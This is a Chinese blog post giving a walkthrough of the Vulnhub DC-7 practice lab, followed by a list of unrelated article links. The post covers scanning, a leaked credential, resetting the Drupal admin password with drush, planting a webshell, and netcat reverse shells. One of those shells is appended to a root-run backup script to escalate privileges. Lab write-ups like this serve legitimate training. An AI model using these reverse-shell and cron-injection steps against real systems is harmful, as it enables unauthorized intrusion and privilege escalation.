当前位置: 首页 > news >正文

Vulnhub靶场 | DC系列 - DC7

文章目录

  • DC-7
  • 环境搭建
  • 渗透测试

DC-7

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.152。

扫描开放的服务。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.152

扫描软件版本

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p 22,80 192.168.10.152

直接访问web服务。

使用nikto扫一下~

┌──(root💀kali)-[~/桌面]
└─# nikto -h 192.168.10.152

发现robots.txt文件,这也是web中的比较重要的敏感文件。

通过探索CMS漏洞、apache漏洞等,都没有发现利用的点。

靶机的信息告诉我们跳出思维惯性,页面的最先面有一个@DC7USER,既然是@开头,大概率是某个账号信息。所以尝试去谷歌或者github搜索@DC7USER。

https://github.com/Dc7User/staffdb

https://github.com/Dc7User/staffdb/blob/master/config.php

原来这里存在源码泄露~(这…脑洞得多大才能想出来)

在配置文件config.php中存在一个用户名和密码:

  • dc7user:MdR3xOgB7#dW

尝试登录下网站~

但是,登录不成功。

尝试使用该用户名和密码,ssh登录成功。

开始提权

使用find / -perm -u=s 2>/dev/null查找设置了suid文件。

使用sudo -l 看一下自己的sudo授权,提示没有该命令,但是有个新邮件。

dc7user@dc-7:~$ cat /var/mail/dc7user

邮件中提到了两个文件,一个/opt/scripts/backups.sh/home/dc7user/backups/website.sql

查看/opt/scripts/backups.sh内容

貌似是为了备份网站的脚本。

该文件的权限如下

对于当前的dc7user用户来说没有写权限,如果想再该脚本中写入代码,需要是root用户或者属于www-data组。因此还是需要从网站入手,拿到www-data用户权限。

其中 drush 命令,是为了管理drupal网站的工具。(输入drush <回车>可以查看drush可以执行的操作)。

以下命令是为了将数据库进行备份。

drush sql-dump --result-file=/home/dc7user/backups/website.sql

尝试使用drush修改管理员admin的密码

dc7user@dc-7:~$ drush user-password admin --password="123"

直接修改不成功,需要先切换到/var/www/html目录

dc7user@dc-7:~$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password="123"

使用修改后的密码登录网站成功。

接下来想办法写马,获取到webshell。

直接将马写在文章中,不行,直接原样输出了。

有上传图片的位置,尝试下图片马,很不幸失败了~

在Drupal官网上查询,

使用中国蚁剑连接

使用nc反弹shell到kali

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 5555    // kali监听// 蚁剑连接
(www-data:/var/www/html) $ nc 192.168.10.146 5555 -e /bin/bash  

使用python获得个交互shell。

www-data@dc-7:/var/www/html$ echo "nc 192.168.10.146 3333 -e /bin/bash" >> /opt/scripts/backups.sh

kali监听,等待计划任务开启,建立连接

📌参考链接

  • https://blog.csdn.net/qq_62794597/article/details/127694798
  • https://blog.csdn.net/single_g_l/article/details/126319163

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Vue3安装Element Plus
  • 怎样通过bs4找出程序中 标签<div class=“List2“>中所有的<li>的内容?
  • 【计算机网络】计算机网络的性能指标
  • 5.3二叉树——二叉树链式结构实现
  • 数学基础 -- 线性代数之矩阵的逆
  • 行为模式7.解释器模式------DSL语言
  • 软件设计原则之接口隔离原则
  • 10、ollama启动LLama_Factory微调大模型(llama.cpp)
  • 网闸与防火墙的区别
  • Python中排序算法之冒泡排序
  • k8s单master多node环境搭建-k8s版本低于1.24,容器运行时为docker
  • deque容器---C++
  • 第4章-06-让无头浏览器加载扩展插件
  • 小程序中使用page-container来做弹窗
  • C++ 洛谷 哈希表(对应题库:哈希,hash)习题集及代码
  • 9月CHINA-PUB-OPENDAY技术沙龙——IPHONE
  • 2019年如何成为全栈工程师?
  • css系列之关于字体的事
  • Facebook AccountKit 接入的坑点
  • gcc介绍及安装
  • JS基础之数据类型、对象、原型、原型链、继承
  • Linux编程学习笔记 | Linux IO学习[1] - 文件IO
  • MYSQL如何对数据进行自动化升级--以如果某数据表存在并且某字段不存在时则执行更新操作为例...
  • php ci框架整合银盛支付
  • Solarized Scheme
  • 表单中readonly的input等标签,禁止光标进入(focus)的几种方式
  • 创建一种深思熟虑的文化
  • 第十八天-企业应用架构模式-基本模式
  • 工程优化暨babel升级小记
  • 聚簇索引和非聚簇索引
  • 开放才能进步!Angular和Wijmo一起走过的日子
  • 思考 CSS 架构
  • 腾讯优测优分享 | Android碎片化问题小结——关于闪光灯的那些事儿
  • 体验javascript之美-第五课 匿名函数自执行和闭包是一回事儿吗?
  • # Redis 入门到精通(一)数据类型(4)
  • ######## golang各章节终篇索引 ########
  • #中的引用型是什么意识_Java中四种引用有什么区别以及应用场景
  • $LayoutParams cannot be cast to android.widget.RelativeLayout$LayoutParams
  • (04)odoo视图操作
  • (32位汇编 五)mov/add/sub/and/or/xor/not
  • (Note)C++中的继承方式
  • (力扣记录)1448. 统计二叉树中好节点的数目
  • (每日一问)操作系统:常见的 Linux 指令详解
  • (详细文档!)javaswing图书管理系统+mysql数据库
  • (小白学Java)Java简介和基本配置
  • (转)Windows2003安全设置/维护
  • (转)原始图像数据和PDF中的图像数据
  • *** 2003
  • .NET C#版本和.NET版本以及VS版本的对应关系
  • .NET Entity FrameWork 总结 ,在项目中用处个人感觉不大。适合初级用用,不涉及到与数据库通信。
  • .NETCORE 开发登录接口MFA谷歌多因子身份验证
  • .Net中wcf服务生成及调用
  • [ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042
  • [AIR] NativeExtension在IOS下的开发实例 --- IOS项目的创建 (一)
  • [ai笔记3] ai春晚观后感-谈谈ai与艺术